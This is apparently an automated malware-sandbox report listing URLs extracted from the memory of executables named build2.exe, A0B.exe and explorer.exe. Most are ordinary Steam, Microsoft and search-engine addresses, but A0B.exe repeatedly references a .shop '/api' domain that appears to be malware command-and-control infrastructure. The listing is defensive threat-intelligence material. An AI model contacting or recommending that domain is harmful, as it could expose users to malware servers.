Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=GRA9
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englis
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=engli
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=yp9unEzrjc_Z&amp
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
Source: build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Zj8Lt-uyXH8R&amp;
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&
Source: build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=n5zImpoIZ8N
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?
Source: build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: explorer.exe, 00000022.00000003.3205641737.0000000007D09000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3201833144.0000000007D0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3221948126.0000000007D1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: A0B.exe, 00000017.00000003.3013927833.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316804996.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: A0B.exe, 00000017.00000003.3013927833.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316804996.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: A0B.exe, 00000017.00000003.3013927833.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316804996.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000022.00000003.3237926713.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3199766395.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3193350386.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3204949143.000000000950D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000002.00000000.2112529074.000000000C048000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com-
Source: build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: explorer.exe, 00000022.00000002.4531306676.0000000007BCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA13SKoy.img
Source: explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: build2.exe, 00000029.00000003.3356770274.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3356577230.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000002.00000000.2112529074.000000000C048000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.come
Source: explorer.exe, 00000022.00000003.3237926713.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3199766395.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3193350386.000000000950D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3204949143.000000000950D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://outlook.comt
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: explorer.exe, 00000022.00000003.3204949143.00000000094D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3199766395.00000000094DF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3193350386.00000000094DF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3237926713.00000000094D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 00000002.00000000.2112529074.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comEMd
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: A0B.exe, 00000017.00000003.3112719948.000000000150A000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3115022315.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3011732883.0000000001490000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3034062459.0000000001507000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000002.3125581472.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3046020871.0000000001503000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3003702566.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3114615460.000000000148E000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000002.3124819163.0000000001492000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3012153145.00000000014AE000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3115958213.0000000001490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://resergvearyinitiani.shop/
Source: A0B.exe, 00000017.00000003.3046020871.0000000001503000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3003702566.00000000014AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://resergvearyinitiani.shop/.
Source: A0B.exe, 00000017.00000003.3034062459.0000000001507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://resergvearyinitiani.shop/8
Source: A0B.exe, 00000017.00000003.3011732883.0000000001490000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3003702566.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3012153145.00000000014AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://resergvearyinitiani.shop/?_
Source: A0B.exe, 00000017.00000003.3011875021.0000000001479000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://resergvearyinitiani.shop/T
Source: A0B.exe, 00000017.00000003.3112719948.000000000150A000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3115022315.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3011732883.0000000001490000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3047552796.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3050934664.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3034062459.0000000001507000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000002.3125581472.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3055723074.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3046020871.0000000001503000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3003702566.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3037616829.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3046520097.000000000150B000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3053757270.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3035470425.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3052487472.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3012153145.00000000014AE000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3048685406.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3049074916.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3049820825.000000000150C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://resergvearyinitiani.shop/api
Source: A0B.exe, 00000017.00000003.3112719948.000000000150A000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3115022315.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000002.3125581472.000000000150C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://resergvearyinitiani.shop/api5
Source: A0B.exe, 00000017.00000003.3112719948.000000000150A000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3115022315.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000002.3125581472.000000000150C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://resergvearyinitiani.shop/apiMs
